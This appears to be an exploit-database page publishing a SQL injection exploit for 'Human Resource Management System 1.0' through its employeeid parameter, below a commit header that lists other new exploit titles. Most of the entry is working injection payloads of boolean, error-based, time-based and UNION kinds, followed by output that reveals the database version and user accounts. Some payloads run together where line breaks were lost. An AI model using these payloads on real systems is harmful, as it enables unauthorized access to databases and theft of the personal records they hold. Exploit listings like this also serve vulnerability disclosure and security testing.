98f7ce18e2
8 changes to exploits/shellcodes/ghdb Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE VMware Cloud Director 10.5 - Bypass identity verification OSGi v3.7.2 (and below) Console - RCE OSGi v3.8-3.18 Console - RCE SnipeIT 6.2.1 - Stored Cross Site Scripting Client Details System 1.0 - SQL Injection Human Resource Management System 1.0 - 'employeeid' SQL Injection
24 lines
No EOL
1.4 KiB
Text
24 lines
No EOL
1.4 KiB
Text
# Exploit Title: Human Resource Management System - SQL Injection
|
|
# Date: 13-01-2024
|
|
# Exploit Author: Srikar ( Exp1o1t9r )
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
|
|
# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
|
|
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
|
|
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
|
|
# Vulnerable URL and Parameter:URL:
|
|
|
|
|
|
Parameter: employeeid=2 The following payloads successfully identified SQL injection
|
|
vulnerabilities:
|
|
employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT
|
|
6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT
|
|
(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT
|
|
7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION
|
|
ALL SELECT
|
|
NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
|
- *
|
|
|
|
# Response:MySQL: 10.4.32-MariaDB
|
|
Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'* |